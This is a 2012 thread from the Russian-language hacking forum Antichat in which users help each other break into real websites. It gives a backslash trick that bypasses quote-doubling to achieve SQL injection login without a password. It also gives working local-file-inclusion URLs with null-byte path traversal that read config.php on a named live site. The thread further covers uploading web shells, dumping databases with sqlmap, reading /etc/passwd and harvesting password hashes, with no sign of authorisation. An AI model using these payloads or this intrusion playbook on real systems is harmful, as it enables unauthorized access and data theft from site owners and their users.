ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
10.07.2012, 11:23
|
|
Banned
Регистрация: 05.05.2009
Сообщений: 1,334
Провел на форуме:
5777251
Репутация:
796
|
|
Сообщение от KeyFound!89
KeyFound!89 said:
Как обойти фильтрацию кавычки функцией eregi_replace ???
есть такой код:
$val){
$_POST[$var]=trim(eregi_replace("'","''",$val)); // экранит кавычку( вместо одной появляется две
}
...
$rez=mysql_query("select id from admins where admlogin='".$_POST["login"]."' and admpass=password('".$_POST["pass"]."');",$link);
>
логин\пасс вбиваются через форму и шлются POST'OM.
Делаю инъект в логин: login=admin' # & pass=anyparol и тут бы все хорошо, но срабатывающий erig_replace превращает select в такое:
Query select id from admins where admlogin='admin' ' #' and admpass=password('anyparol').
Исходник скрипта у меня есть и я пробовал убирать строку с фильтрацией тогда можно логиниться без пасса! Помагите пожалуйста обойти экранирование!
Т.к. используется реплейс одной одинарной кавычки на две, и если в коде нет больше никаких фильтраций и экранирований(и выключен magiq_quotes), то это легко обходится с помощью бэкслеша. Пример:
\' union select 111#
получится
select id from admins where admlogin='\'' union select 111#' and admpass=password('anyparol')
Первую кавычку мы экранируем, а вторую что подставит скрипт закроет запрос.
|
|
|
10.07.2012, 11:31
|
|
Новичок
Регистрация: 08.05.2009
Сообщений: 8
Провел на форуме:
49568
Репутация:
1
|
|
Подскажите, пж-ста:
Есть мини-шелл. Но оказалось, что на сервере allow_url_fopen off. Соответственно, при классической заливке выдает ошибку.
Каким образом можно залить полноценный шел на данный сервер?
|
|
|
|
10.07.2012, 14:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
70690
Репутация:
-5
|
|
http://www.swspace.ru/reader/index.php?id=18&page=1'
по чему то дальше не раскрутилась даже через Havij
в чём проблема?
|
|
|
|
10.07.2012, 14:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
45774
Репутация:
26
|
|
Сообщение от Hapk
Hapk said:
http://www.swspace.ru/reader/index.php?id=18&page=1'
по чему то дальше не раскрутилась даже через Havij
в чём проблема?
если я не ошибаюсь, то это не скуля...
|
|
|
|
10.07.2012, 14:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
70690
Репутация:
-5
|
|
Сообщение от smirk
smirk said:
если я не ошибаюсь, то это не скуля...
Ну тогда я понимаю что вообще нечего нельзя сделать да?
|
|
|
|
10.07.2012, 14:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
142623
Репутация:
19
|
|
Сообщение от Hapk
Hapk said:
Ну тогда я понимаю что вообще нечего нельзя сделать да?
Этоже LFI а мб и RFI, только хвостик ты врятли из запроса откинешь, поэтому чтение только в текущем котологе, хотя если код не инклюдиться\выполняеться что скорее всего правда, то это просто читалка в тек-щем котологе.
|
|
|
|
10.07.2012, 14:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
9872
Репутация:
2
|
|
вот чуток удалось прочитать
http://www.swspace.ru/reader/index.php?id=18&page=../../%00
|
|
|
|
10.07.2012, 14:58
|
|
Banned
Регистрация: 05.05.2009
Сообщений: 1,334
Провел на форуме:
5777251
Репутация:
796
|
|
Думаю это его больше заинтересует
http://www.swspace.ru/reader/index.php?id=18&page=../../../config.php%00
http://www.swspace.ru/myadmin/
|
|
|
|
10.07.2012, 14:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
9872
Репутация:
2
|
|
опа, чоткий! я конфиг в другой папке искал
|
|
|
|
10.07.2012, 17:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
980
Репутация:
0
|
|
Сообщение от .Varius
.Varius said:
Т.к. используется реплейс одной одинарной кавычки на две, и если в коде нет больше никаких фильтраций и экранирований(и выключен magiq_quotes), то это легко обходится с помощью бэкслеша. Пример:
\' union select 111#
получится
select id from admins where admlogin='\'' union select 111#' and admpass=password('anyparol')
Первую кавычку мы экранируем, а вторую что подставит скрипт закроет запрос.
Спасибо! Я догадался использовать слеш, но уже когда иньектил в pass. В общем там я все раскрутил и получил Remote SQL Injection Authentication Bypass.
Теперь вопросы сложне)):
Через выше указанный SQL Injection Authentication Bypass я получил доступ к двум разным админкам одного ресурса. В одной есть blind-sql, его я даже не стал смотреть руками, сразу отправил в sqlmap, профит есть, все читается\дампиться но очень долго( одну табличку на 30 к записей (2 мб) дампил всю ночь. А там до черта нужных мне таблиц.
Вторая админка - редактор страниц сайта. Весь сайт построен на .shtml и редактировать можно только их. Профита в этом я пока еще не узрел(
Короче нужен шелл, а как закинуть не представляю.
И еще - через blind-sql в первой админке пробовал читать файлы, /etc/passwd читается нормально. Еще раньше я находил на ресурсе ошибки раскрытия системного пути и я знаю структуру папок, пробовал прочитать через инькт конфиги из корня сайта(типо mysql.inc.php), но не тут то было, сайт и бд на разных серваках, а через sql насколько я понимаю читаются те файлы которые на сервере бд, а не на сервере сайта, правильно? А структуру папок сервера бд я не знаю, может есть какие то стандартные пути до конфигов, подскажите. На сервере бд есть например ssh, может можно както стянуть хеши? В общем нужны идеи как полноценно залить шел на сайт, чтобы прочитать конфиг подключения к бд и нормально к ней подключаться, а не извращаться через иньект.
И, да, - логины\хеши пользователей бд я конечно сдампил через иньект, но они неразбиваемые, я прбовал, но в общем то я и так знаю что они там надежные - до 20 символов всякого извращения(
P.S. И еще, как называется уязвимость такого рода: к одному из разделов сайта есть доступ только из внутренней сети (диапазон ip) а я нашел способ проникать туда из обычного инета, как правильно называется тип такой уязвимости?
P.S.S. Я только учусь... Кстати: ищу Сенсея! Готов работать без еды и отдыха, только направляйте по пути истинного дзена
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
